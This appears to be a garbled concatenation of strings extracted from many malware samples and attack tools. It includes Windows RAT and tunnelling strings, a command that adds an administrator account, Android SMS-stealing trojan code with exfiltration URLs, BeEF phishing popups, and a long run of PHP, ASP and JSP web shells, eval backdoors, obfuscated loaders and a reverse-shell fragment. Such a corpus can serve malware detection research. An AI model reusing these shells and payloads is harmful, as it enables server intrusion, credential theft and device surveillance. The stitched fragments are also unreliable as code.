1 users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 users\\cmd\\desktop\\msacm32\\release\\msacm32.pdbp
1 usersrequires an a network as argumentdamn dude, port numbers are in 1 .. 65535(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)i:\\ference\\addres\\documents2.pdbid:%lu|bid:%lu|os:%lu|la:%lu|rg:%luid:%lu|tid:%lu|err:%lu|w32:%luid:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%luph5.0
1 user registry info - userportindex: %dcould not report legacy device - %xentering serialgetportinfo'user registry info - userport: %xioopendeviceregistrykey failed - %x kernel debugger is using port at address %xrelease - freeing multi contextserial driver will not load port'user registry info - useraddressspace: %dserialadddevice: enumeration request, returning no_more_entries'user registry info - userindexed: %d\
1 username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
1 user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
1 pass.dicsql.datfetch.pymethod=postcmdpathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-bfr423mi_6uamtg$bxl\\sd1iu/0ok.cpegbb63-t2p_.rkd0uaeu/x1c$s\\o4ilx\"a-201mt6b3si$ /cebok_i\\m.rdpu4fulgomv3.a 1%tnd\\4ils60n2te_w4mei gd2%rob-8pct1wq_hynlsc0.u9az:\\projects\\rescator\\uploader\\debug\\scheck.pdbs region: found [] bytes of pattern:[cc2 region:cc memregion:kaptoxa=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:gotit6i2cn3sep1 uio$ra0su\\wo4b:_kdltw/.nsystem.resources.resourcereader, mscorlib, version=2.0.0.0, culture=neutral, publickeytoken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackd
1 users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
1 password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 passwordstub.form1.resourcesf
1 user net user temp 123456 /add & net localgroup administrators temp /addrunning command with system token...thread impersonating, got network service token: 0x%xfound system token 0x%xthread not impersonating, looking for another thread...p
1 password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
1 useraccountss
1 password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
1 userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 users\\*\\roaming\\mozilla\\firefox\\profiles\\*\\documents and settings\\*%
1 password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (get-content $env:public\\libraries\\dns.ps1) -replace ('#'+'##'),$botid | set-content $env:public\\libraries\\dns.ps1invoke-expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertto-base36(get-random -maximum 46655)))flash.media.sound()call kernel32!virtualalloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4d36e972-e325-11ce-bfc1-08002be10318}netstreamzhoupin exploit crewzhopin exploit crewbackdoorloggerzhuaddresspcap_dump_openresolving ips to poison...warnning: gateway ip can not be found%s-%02d%02d%02d%02d%02d.rc:\\users\\%s\\appdata\\cookies\\n
1 userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if 